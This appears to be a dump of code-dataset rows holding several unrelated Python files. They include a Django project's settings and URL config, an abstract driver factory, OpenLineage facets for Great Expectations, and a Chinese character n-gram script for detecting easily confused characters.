blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
38230ca8d3651d93fb529af377a3b02deb0dae18 | 699ca6931be13ad8a3f4eed26dade7f37cd00bb4 | /temp/bicycles.py | efbcd87b53c9baa13bc9da53e090e99becccbafb | [] | no_license | TimliangLei/studyPython | 5638f317fa01a40b6e3bb3d0b6dd60685f2b07f3 | fb758b42bb01326444dddc1112e9b14e17177b79 | refs/heads/master | 2021-10-30T09:41:24.423533 | 2019-04-26T02:46:00 | 2019-04-26T02:46:00 | 124,232,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | bicycles=['trek','cannondale','redline','speciallized']
print(bicycles)  # prints the raw list representation
print(bicycles[0].title())  # first element, title-cased
print(bicycles[-1])  # index -1 returns the last element
# Build a sentence from the first brand name.
message="My first bicycle was a "+bicycles[0].title()+"."
print(message)
| [
"timlianglei@126.com"
] | timlianglei@126.com |
8e747b87fe26be4867117e37b2c24add1e4668e0 | 7f0822e81575cd306edfea299b6f7d5356b603e5 | /one_two_jango/settings.py | a63edb480345a3d3e6d6c7444c2a993a1e98fea5 | [
"BSD-3-Clause"
] | permissive | jia1/one-two-jango | 0f68af1e9e0127eba9db16c3f9b17f172b1843b2 | 49393e2699f4785e7f7d218f9de6a4592e23a39e | refs/heads/master | 2021-07-05T12:09:26.710500 | 2017-09-29T12:32:58 | 2017-09-29T12:32:58 | 104,497,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,444 | py | """
Django settings for one_two_jango project.
Generated by 'django-admin startproject' using Django 1.11.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to the repository; rotate it and load it
# from the environment before any production use.
SECRET_KEY = 'jrncnn0r-mv#+l9y=vu%53)h7c&jfi#^2r4hyce)p1(mipym%!'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Host headers Django will serve (the Heroku deployment domain).
ALLOWED_HOSTS = ['one-two-jango.herokuapp.com']

# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    # WhiteNoise serves static files directly from the app process (Heroku).
    'whitenoise.middleware.WhiteNoiseMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'one_two_jango.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        # app-local "templates/" directories are searched automatically
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'one_two_jango.wsgi.application'

# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases

# Local SQLite file; fine for development only.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/

STATIC_URL = '/static/'
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
# collectstatic target directory
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
# extra source directories searched by the staticfiles finders
STATICFILES_DIRS = (os.path.join(PROJECT_ROOT, 'static'),)
# NOTE(review): 'whitenoise.django.*' is the legacy (pre-4.0) WhiteNoise
# storage path -- verify it matches the installed whitenoise version.
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
| [
"jiayeerawr@gmail.com"
] | jiayeerawr@gmail.com |
c66645032b93cfe99a40b95fce3b5079076f0f63 | 3f095a37cae521bdb06aa98c200563d80eb4d7c5 | /django-projects/sosio/myapi/urls.py | 7dc55683978b6928874ec768504d4e2d1c43607f | [] | no_license | sArun-kumar/create | 83363ae3eaf98d3682f818b7f7987b431f348fa7 | c7f7ce744c64042f6a67d5666814f47e76885604 | refs/heads/master | 2020-09-23T21:11:59.386480 | 2019-12-03T09:59:39 | 2019-12-03T09:59:39 | 225,586,385 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | from django.urls import include, path
from rest_framework import routers
from . import views
# DRF router: auto-generates list/detail URL patterns for the registered viewset.
router = routers.DefaultRouter()
router.register(r'Article', views.ArticleViewSet)
urlpatterns = [
path('', include(router.urls)),
path('api-auth/', include('rest_framework.urls', namespace='rest_framework'))
] | [
"57952933+sArun-kumar@users.noreply.github.com"
] | 57952933+sArun-kumar@users.noreply.github.com |
62a90103f21a16407a8f42e0a21947b511a5a5cc | 622bd4fb4cb50361a5e887544d92a04debb0dd2b | /databus/driver/abstract_factory.py | a69171d86050ecd1512ef2bc9a59efa3c6862f46 | [
"Apache-2.0"
] | permissive | tedrepo/databus | aec06bd28f761ca4beff290fc856e93dd2948c07 | 0f1f290c1b061175a652c3f72efc0d091a5e08c9 | refs/heads/master | 2022-12-01T03:10:15.182783 | 2020-08-08T18:40:54 | 2020-08-08T18:40:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py | """ Abstract driver factory module """
from abc import ABC, abstractmethod
from enum import Enum
from databus.driver.abstract_driver import AbstractDriver
from databus.processor.abstract_factory import AbstractProcessorFactory
from databus.pqueue.abstract_factory import AbstractQueueFactory
from databus.puller.abstract_factory import AbstractPullerFactory
from databus.pusher.abstract_factory import AbstractPusherFactory
class DriverCreationError(Exception):
    """ Driver creation exception

    Raised when a databus driver instance can't be built; ``error_code``
    tells the reason and ``module`` names the driver module involved.
    """

    class ErrorCode(Enum):
        """ Driver creation error code """
        # NOTE: the original code declared these as annotations
        # ("cant_create_instance: 1"), which creates NO Enum members at all;
        # real members require assignments.
        cant_create_instance = 1
        parameter_missing = 2

    def __init__(self, p_error_code: ErrorCode, p_module: str = ""):
        """
        :param p_error_code: reason for the failure.
        :param p_module: name of the driver module; None is normalised to "".
        """
        super().__init__()
        self.error_code = p_error_code
        # guard against callers explicitly passing None
        if p_module is None:
            self.module = ""
        else:
            self.module = p_module

    @property
    def message(self) -> str:
        """ Error message as string """
        if self.error_code == DriverCreationError.ErrorCode.cant_create_instance:
            return "Can't create " + self.module + " driver instance"
        return "Driver creation error"
class AbstractDriverFactory(ABC):  # pylint: disable=R0903
    """ Abstract driver factory class

    Concrete subclasses assemble an AbstractDriver from the four
    collaborating factories passed to create_driver().
    """
    @abstractmethod
    def create_driver(self,  # pylint: disable=R0913
                      p_module: str,
                      p_queue_factory: AbstractQueueFactory,
                      p_processor_factory: AbstractProcessorFactory,
                      p_puller_factory: AbstractPullerFactory,
                      p_pusher_factory: AbstractPusherFactory
                      ) -> AbstractDriver:
        """ Driver creation

        :param p_module: name of the driver module to instantiate.
        :param p_queue_factory: factory supplying the driver's queue.
        :param p_processor_factory: factory supplying processors.
        :param p_puller_factory: factory supplying pullers.
        :param p_pusher_factory: factory supplying pushers.
        :return: a ready-to-use driver instance.
        """
| [
"kerem@koseoglu.info"
] | kerem@koseoglu.info |
6d33c0003e476ec33c351028029173031c719722 | 97cfe02f314895419b741cdc88eeb17c0f9df0dd | /integration/common/openlineage/common/provider/great_expectations/facets.py | 0612c7d9bbe4ef56aff7cc6fe788af7996ebbde7 | [
"Apache-2.0"
] | permissive | briansorahan/OpenLineage | b801827a40fb0a61feff4348d8dff1391a26ed39 | c3aa70e161244091969951d0da4f37619bcbe36f | refs/heads/main | 2023-08-25T10:55:34.352490 | 2021-10-28T11:49:58 | 2021-10-28T11:49:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,735 | py | from typing import List, Optional, Union, Dict
import attr
from great_expectations.core import IDDict
from great_expectations.core.batch import BatchMarkers, BatchDefinition
from great_expectations.core.id_dict import BatchSpec, BatchKwargs
from openlineage.client.facet import BaseFacet
from openlineage.common.provider.great_expectations.results import GreatExpectationsAssertion
@attr.s
class GreatExpectationsRunFacet(BaseFacet):
    """
    Custom facet which describes the instance of GreatExpectations and the suite configuration
    """

    great_expectations_version = attr.ib()
    expectation_suite_name: str = attr.ib()
    # run_id arrives as an object exposing to_json_dict(); stored as a plain dict
    run_id: Dict = attr.ib(converter=lambda x: x.to_json_dict())
    expectation_suite_meta: Dict = attr.ib()
    validation_time: str = attr.ib()
    # batch descriptors are optional -- not every validation supplies them
    batch_spec: Optional[BatchSpec] = attr.ib(default=None)
    batch_markers: Optional[BatchMarkers] = attr.ib(default=None)
    batch_kwargs: Optional[BatchKwargs] = attr.ib(default=None)
    active_batch_definition: Union[None, IDDict, BatchDefinition] = attr.ib(default=None)
    batch_parameters = attr.ib(default=None)

    @staticmethod
    def _get_schema() -> str:
        # JSON-schema location describing this custom facet
        return "https://github.com/OpenLineage/OpenLineage/tree/main/integration/common/openlineage/common/provider/ge-run-facet.json"  # noqa
@attr.s
class GreatExpectationsAssertionsDatasetFacet(BaseFacet):
    """
    This facet represents passed/failed status of asserted expectations on dataset
    """

    # one entry per asserted expectation
    assertions: List[GreatExpectationsAssertion] = attr.ib()

    @staticmethod
    def _get_schema() -> str:
        # JSON-schema location describing this custom facet
        return "https://github.com/OpenLineage/OpenLineage/tree/main/integration/common/openlineage/common/provider/ge-assertions-dataset-facet.json"  # noqa
| [
"noreply@github.com"
] | briansorahan.noreply@github.com |
b3af60e9a9eafa6c29e2e9a9f392486a6fc29ad4 | 30402db627b01e28347bf94cc4be6af68a0a7d2b | /yuzhao.py | d291f1953aefb47df074d175e702801af8b4210e | [] | no_license | SUMORAN/character_pair | ecd47d9a8be128d868ab19c207edec3c056ac61c | dff64303c3193d6932618bb7650ab37901bc15f6 | refs/heads/master | 2020-04-26T16:00:29.324610 | 2019-03-04T04:00:22 | 2019-03-04T04:00:22 | 173,664,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,078 | py | # -*- encoding: utf-8 -*-
import math
import random
import codecs
RAW_TEXT_PATH = "zhangwenbin.txt"  # raw (unsegmented) Chinese corpus
PARTED_TEXT_PATH = "parted_text.txt"  # corpus after character segmentation
WORD2IDX_PATH = 'word2idx_dic.txt'  # word -> index dictionary file
IDX2WORD_PATH = 'idx2word_dic.txt'  # index -> word dictionary file
TEST_PATH = 'test.txt'  # text whose confusable characters get checked
PROP_DICT_PATH = 'prop_dict.txt'  # generated n-gram probability dictionary file

# Visually similar, easily confused characters; generate_propdic() precomputes
# context probabilities for each of them.
similar_word = [
    "哀", "衰", "衷",
    "嗳", "暧", "暖",
    "巴", "巳",
    "拔", "拨",
    "斑", "班",
    "人", "入",
    "一", "-",
    "二", "=",
    "戋", "践",
    "己", "已",
    "候", "侯",
    "日", "曰",
    "间", "问",
    "央", "决",
    '粤', "粵"
]
# Strip noise tokens and punctuation from a single line of text: most
# punctuation is deleted, sentence-ending marks become spaces, and every
# digit collapses to '9'; the result is stripped and lower-cased.
def rm_useless_tokens(line):
    # (old, new) pairs applied strictly in the original order -- ordering
    # matters because later patterns can match text exposed by earlier
    # substitutions (e.g. "'s" left behind after a removed '.').
    _SUBSTITUTIONS = (
        ('.', ''), ('(', ''), (')', ''),
        ('?', ' '), ('!', ' '), ('/', ''), (',', ''), ('@', ''),
        ("\"", " "), (":", " "), ('【', ''), ('】', ''), ('+', ''),
        (';', ''), ('*', ''), ('_', ''), ('\'s', ''), ('\' ', ''), ('\n', ''),
        ('~', ''), ('', ''), ('。', ''), ('、', ''), ('|', ''), ('1', '9'),
        ('2', '9'), ('3', '9'), ('4', '9'), ('5', '9'), ('6', '9'), ('7', '9'),
        ('8', '9'), ('9', '9'), ('.', '9'), ('/', ''), ('“', ''), ('”', ''),
        ('‘', ''), ('’', ''),
    )
    cleaned = line
    for old, new in _SUBSTITUTIONS:
        cleaned = cleaned.replace(old, new)
    return cleaned.strip().lower()
def ChineseParticiple(raw_text_path=RAW_TEXT_PATH, parted_text_path=PARTED_TEXT_PATH):
    """Segment a Chinese corpus character by character.

    Every non-space character of ``raw_text_path`` is written on its own
    line, appended to ``parted_text_path``.

    Args:
        raw_text_path: path of the raw (unsegmented) text file.
        parted_text_path: path of the output file (opened in append mode).
    """
    print('\033[1;33mStart participate Chinese\033[0m')
    # "with" guarantees both handles are closed even if an iteration fails
    # (the original left them open on error).
    with codecs.open(raw_text_path, 'r', encoding='utf-8') as source, \
            codecs.open(parted_text_path, 'a', encoding='utf-8') as target:
        for line in source:
            # one character per output line; plain spaces are dropped
            seg_list = [ch for ch in line if ch != ' ']
            target.writelines('\n'.join(seg_list))
    print('\033[1;33mparticipate Chinese DONE!\033[0m')
def generate_dic(parted_text_path=PARTED_TEXT_PATH):
    """Build word<->index dictionaries from the segmented corpus.

    Args:
        parted_text_path: segmented text file, one token per line.

    Returns:
        Tuple ``(word_to_ix, ix_to_word)`` mapping token -> index and back.
        Indices come from iterating a set, so they are only stable within a
        single process run.
    """
    print('Load raw text……')
    # "with" closes the handle (the original leaked it)
    with open(parted_text_path, 'r', encoding='utf-8') as source:
        # keep every non-empty physical line, stripped of its newline
        raw_text = [line.strip() for line in source if line != '']
    word_to_ix = {}
    ix_to_word = {}
    # vocabulary: unique tokens of the corpus
    for i, word in enumerate(set(raw_text)):
        word_to_ix[word] = i
        ix_to_word[i] = word
    return word_to_ix, ix_to_word
def save_dic(dic, dic_path):
    """Persist ``dic`` to ``dic_path`` as its ``str()`` representation.

    Counterpart of :func:`load_dic`, which evaluates the text back into a
    dictionary.

    Args:
        dic: dictionary to save.
        dic_path: destination file path (truncated/overwritten).
    """
    # "with" guarantees the handle is flushed and closed even if write()
    # raises (the original relied on an explicit close that would be skipped).
    with open(dic_path, 'w+', encoding='utf-8') as fw:
        fw.write(str(dic))  # serialise via repr; load_dic() reads it back
def load_dic(dic_path):
    """Load a dictionary previously written by :func:`save_dic`.

    Args:
        dic_path: file containing ``str(dict)`` text.

    Returns:
        The reconstructed dictionary.
    """
    # "with" closes the handle (the original relied on an explicit close).
    with open(dic_path, 'r+', encoding='utf-8') as fr:
        # NOTE(review): eval() executes arbitrary code from the file -- safe
        # only because these files are produced locally by save_dic();
        # ast.literal_eval would be the safer drop-in for literal dicts.
        return eval(fr.read())
def load_rawText(parted_text_path=PARTED_TEXT_PATH):
    """Load the segmented corpus as a list of stripped tokens.

    Args:
        parted_text_path: segmented text file, one token per line.

    Returns:
        List of tokens, blank-line artefacts removed by strip().
    """
    print('Load raw text……')
    # "with" closes the handle (the original leaked it)
    with open(parted_text_path, 'r', encoding='utf-8') as source:
        # keep every non-empty physical line, stripped of its newline
        return [line.strip() for line in source if line != '']
def word2idx(raw_text, word_to_ix):
    """Map each token of ``raw_text`` to its index string.

    Tokens missing from ``word_to_ix`` fall back to a random index string
    in [1, 2000], so unknown tokens still produce a placeholder.

    Args:
        raw_text: iterable of tokens.
        word_to_ix: token -> integer index mapping.

    Returns:
        List of index strings, aligned with ``raw_text``.
    """
    indices = []
    for token in raw_text:
        if token in word_to_ix:
            indices.append(str(word_to_ix[token]))
        else:
            # out-of-vocabulary token: random placeholder index
            indices.append(str(random.randint(1, 2000)))
    return indices
'''
功能:根据训练语料生成概率字典
参数:
parted_text_path: 分词后文件路径
word2idx_path: word to idx 字典路径
save_path: 生成的字典保存路径
'''
def generate_propdic(parted_text_path, word2idx_path, idx2word_path, wordlist, save_path):
    """Build the add-k-smoothed n-gram probability dictionary for *wordlist*.

    Counts unigram/bigram/trigram windows (single-sided and double-sided)
    over the segmented corpus and stores smoothed conditional probabilities
    keyed by index strings / tuples of index strings, then persists the
    result with save_dic().

    Args:
        parted_text_path: segmented corpus file (one token per line).
        word2idx_path: path of the word -> index dictionary file.
        idx2word_path: path of the index -> word dictionary file.
        wordlist: characters of interest (easily confused characters).
        save_path: destination file for the probability dictionary.
    """
    raw_text = load_rawText(parted_text_path)
    word2idx_dic = load_dic(word2idx_path)
    idx2word_dic = load_id2word(idx2word_path)
    # corpus rewritten as index strings, aligned with raw_text
    raw_text_idx = word2idx(raw_text, word2idx_dic)
    prop_dict = {}
    print('正在计算context_single')
    # single-sided contexts: every unigram/bigram/trigram window of the corpus
    context_single = []
    # window = 0
    for i in range(0, len(raw_text_idx)):
        whole = [raw_text_idx[i]]
        context_single.append(whole)
    # window = 1
    for i in range(1, len(raw_text_idx) - 1):
        whole_left = [raw_text_idx[i - 1], raw_text_idx[i]]
        whole_right = [raw_text_idx[i], raw_text_idx[i + 1]]
        context_single.append(whole_left)
        context_single.append(whole_right)
    # window = 2
    for i in range(2, len(raw_text_idx) - 2):
        whole_left = [raw_text_idx[i - 2], raw_text_idx[i - 1], raw_text_idx[i]]
        whole_right = [raw_text_idx[i], raw_text_idx[i + 1], raw_text_idx[i + 2]]
        context_single.append(whole_left)
        context_single.append(whole_right)
    print('正在计算context_double')
    # double-sided contexts: centre token plus neighbours on both sides
    context_double = []
    whole_double = []
    # window = 1
    for i in range(1, len(raw_text_idx) - 1):
        whole = [raw_text_idx[i - 1], raw_text_idx[i], raw_text_idx[i + 1]]
        context_temp = [raw_text_idx[i - 1], raw_text_idx[i + 1]]
        whole_double.append(whole)
        context_double.append(context_temp)
    # window = 2
    for i in range(2, len(raw_text_idx) - 2):
        whole = [raw_text_idx[i - 2], raw_text_idx[i - 1], raw_text_idx[i],
                 raw_text_idx[i + 1], raw_text_idx[i + 2]]
        context_temp = [raw_text_idx[i - 2], raw_text_idx[i - 1],
                        raw_text_idx[i + 1], raw_text_idx[i + 2]]
        whole_double.append(whole)
        context_double.append(context_temp)
    wordlist = word2idx(wordlist, word2idx_dic)
    # V is the number of all collected N-gram windows (smoothing denominator)
    V1 = len(context_single)
    V2 = len(context_double)
    # Add-k smoothing (Lidstone's law): k is a positive constant smaller than 1
    k = 0.1
    hasdone = dict()
    for i in range(0, len(raw_text_idx)):
        print("progress: ", str(float(i)/len(raw_text_idx)))
        if raw_text_idx[i] in wordlist:
            if raw_text_idx[i] not in hasdone:
                print('------------------------------')
                print('正在计算“{}”相关词的概率'.format(raw_text[i]))
                # smoothed unigram probability of the character itself
                prop_dict[raw_text_idx[i]] = (context_single.count([raw_text_idx[i]])+k)/V1
                hasdone[raw_text_idx[i]] = list()
            # at least two characters available on the left
            if i > 1:
                left_combine1 = idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])]
                left_combine2 = idx2word_dic[int(raw_text_idx[i-2])] + idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])]
                if left_combine1 not in hasdone[raw_text_idx[i]]:
                    # left-sided bigram
                    prop_dict[(raw_text_idx[i-1],raw_text_idx[i])] = (context_single.count([raw_text_idx[i-1],raw_text_idx[i]]) + \
                        k)/(context_single.count([raw_text_idx[i-1]]) + k*V1)
                    print('prop_dict[raw_text_idx[i-1],raw_text_idx[i]]:',prop_dict[(raw_text_idx[i-1],raw_text_idx[i])])
                    hasdone[raw_text_idx[i]].append(left_combine1)
                if left_combine2 not in hasdone[raw_text_idx[i]]:
                    # left-sided trigram
                    prop_dict[(raw_text_idx[i-2],raw_text_idx[i-1],raw_text_idx[i])] = (context_single.count([raw_text_idx[i-2],raw_text_idx[i-1],raw_text_idx[i]]) + k)/(context_single.count([raw_text_idx[i-2],raw_text_idx[i-1]]) + k*V1)
                    hasdone[raw_text_idx[i]].append(left_combine2)
                # at least two characters available on the right
                if i < len(raw_text_idx)-2 :
                    right_combine1 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
                    right_combine2 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])] + idx2word_dic[int(raw_text_idx[i+2])]
                    right_combine3 = idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
                    right_combine4 = idx2word_dic[int(raw_text_idx[i-2])] + idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])] + idx2word_dic[int(raw_text_idx[i+2])]
                    if right_combine1 not in hasdone[raw_text_idx[i]]:
                        # right-sided bigram
                        prop_dict[(raw_text_idx[i],raw_text_idx[i+1])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1]]) + \
                            k)/(context_single.count([raw_text_idx[i+1]]) + k*V1)
                        hasdone[raw_text_idx[i]].append(right_combine1)
                    if right_combine2 not in hasdone[raw_text_idx[i]]:
                        # right-sided trigram
                        prop_dict[(raw_text_idx[i],raw_text_idx[i+1],raw_text_idx[i+2])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1],\
                            raw_text_idx[i+2]]) + k)/(context_single.count([raw_text_idx[i+1],raw_text_idx[i+2]]) + k*V1)
                        hasdone[raw_text_idx[i]].append(right_combine2)
                    if right_combine3 not in hasdone[raw_text_idx[i]]:
                        # double-sided, window 1
                        prop_dict[(raw_text_idx[i-1],raw_text_idx[i],raw_text_idx[i+1])] = (whole_double.count([raw_text_idx[i-1],raw_text_idx[i],\
                            raw_text_idx[i+1]]) + k)/(context_double.count([raw_text_idx[i - 1], raw_text_idx[i + 1]]) + k*V2)
                        hasdone[raw_text_idx[i]].append(right_combine3)
                    if right_combine4 not in hasdone[raw_text_idx[i]]:
                        # double-sided, window 2
                        prop_dict[(raw_text_idx[i - 2], raw_text_idx[i - 1], raw_text_idx[i], raw_text_idx[i + 1], raw_text_idx[i + 2])]\
                            = (whole_double.count( [raw_text_idx[i - 2], raw_text_idx[i - 1], raw_text_idx[i],raw_text_idx[i + 1], raw_text_idx[i + 2]])\
                            + k)/(context_double.count( [raw_text_idx[i - 2], raw_text_idx[i - 1], raw_text_idx[i + 1], raw_text_idx[i + 2]]) + k*V2)
                        hasdone[raw_text_idx[i]].append(right_combine4)
                # exactly one character on the right
                elif i == len(raw_text_idx)-2 :
                    right_combine1 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
                    right_combine3 = idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
                    if right_combine1 not in hasdone[raw_text_idx[i]]:
                        # right-sided bigram
                        prop_dict[(raw_text_idx[i],raw_text_idx[i+1])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1]]) + \
                            k)/(context_single.count([raw_text_idx[i+1]]) + k*V1)
                        hasdone[raw_text_idx[i]].append(right_combine1)
                    if right_combine3 not in hasdone[raw_text_idx[i]]:
                        # double-sided, window 1
                        prop_dict[(raw_text_idx[i-1],raw_text_idx[i],raw_text_idx[i+1])] = (whole_double.count([raw_text_idx[i-1],raw_text_idx[i],\
                            raw_text_idx[i+1]]) + k)/(context_double.count([raw_text_idx[i - 1], raw_text_idx[i + 1]]) + k*V2)
                        hasdone[raw_text_idx[i]].append(right_combine3)
                # no characters left on the right
                else:
                    pass
            # exactly one character on the left
            elif i == 1:
                left_combine1 = idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])]
                # NOTE(review): reads raw_text_idx[i+1] without checking the
                # right boundary -- raises IndexError when the corpus has
                # exactly two tokens; confirm corpora are always longer.
                left_combine2 = idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
                if left_combine1 not in hasdone[raw_text_idx[i]]:
                    # left-sided bigram
                    prop_dict[(raw_text_idx[i-1],raw_text_idx[i])] = (context_single.count([raw_text_idx[i-1],raw_text_idx[i]]) + \
                        k)/(context_single.count([raw_text_idx[i-1]]) + k*V1)
                    hasdone[raw_text_idx[i]].append(left_combine1)
                if left_combine2 not in hasdone[raw_text_idx[i]]:
                    # double-sided, window 1
                    prop_dict[(raw_text_idx[i-1],raw_text_idx[i],raw_text_idx[i+1])] = (whole_double.count([raw_text_idx[i-1],raw_text_idx[i],\
                        raw_text_idx[i+1]]) + k)/(context_double.count([raw_text_idx[i - 1], raw_text_idx[i + 1]]) + k*V2)
                    hasdone[raw_text_idx[i]].append(left_combine2)
                # at least two characters on the right
                if i < len(raw_text_idx)-2 :
                    right_combine1 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
                    right_combine2 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])] + idx2word_dic[int(raw_text_idx[i+2])]
                    if right_combine1 not in hasdone[raw_text_idx[i]]:
                        # right-sided bigram
                        prop_dict[(raw_text_idx[i],raw_text_idx[i+1])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1]]) + \
                            k)/(context_single.count([raw_text_idx[i+1]]) + k*V1)
                        hasdone[raw_text_idx[i]].append(right_combine1)
                    if right_combine2 not in hasdone[raw_text_idx[i]]:
                        # right-sided trigram
                        prop_dict[(raw_text_idx[i],raw_text_idx[i+1],raw_text_idx[i+2])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1],\
                            raw_text_idx[i+2]]) + k)/(context_single.count([raw_text_idx[i+1],raw_text_idx[i+2]]) + k*V1)
                        hasdone[raw_text_idx[i]].append(right_combine2)
                # exactly one character on the right
                elif i == len(raw_text_idx)-2 :
                    right_combine1 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
                    if right_combine1 not in hasdone[raw_text_idx[i]]:
                        # right-sided bigram
                        prop_dict[(raw_text_idx[i],raw_text_idx[i+1])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1]]) + k)/(\
                            context_single.count([raw_text_idx[i+1]]) + k*V1)
                        hasdone[raw_text_idx[i]].append(right_combine1)
                else:
                    pass
            # no characters on the left
            elif i == 0:
                # at least two characters on the right
                if i < len(raw_text_idx)-2 :
                    right_combine1 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
                    right_combine2 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])] + idx2word_dic[int(raw_text_idx[i+2])]
                    if right_combine1 not in hasdone[raw_text_idx[i]]:
                        # right-sided bigram
                        prop_dict[(raw_text_idx[i],raw_text_idx[i+1])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1]]) + \
                            k)/(context_single.count([raw_text_idx[i+1]]) + k*V1)
                        hasdone[raw_text_idx[i]].append(right_combine1)
                    if right_combine2 not in hasdone[raw_text_idx[i]]:
                        # right-sided trigram
                        prop_dict[(raw_text_idx[i],raw_text_idx[i+1],raw_text_idx[i+2])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1],\
                            raw_text_idx[i+2]]) + k)/(context_single.count([raw_text_idx[i+1],raw_text_idx[i+2]]) + k*V1)
                        hasdone[raw_text_idx[i]].append(right_combine2)
                # exactly one character on the right
                elif i == len(raw_text_idx)-2 :
                    right_combine1 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
                    if right_combine1 not in hasdone[raw_text_idx[i]]:
                        # right-sided bigram
                        prop_dict[(raw_text_idx[i],raw_text_idx[i+1])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1]]) + \
                            k)/(context_single.count([raw_text_idx[i+1]]) + k*V1)
                        hasdone[raw_text_idx[i]].append(right_combine1)
                else:
                    pass
    print(prop_dict)
    save_dic(prop_dict, save_path)
def load(word2idx_path, prop_dict_path):
    """Load the word->index dictionary and the probability dictionary.

    Args:
        word2idx_path: file written by save_dic() for the word->index map.
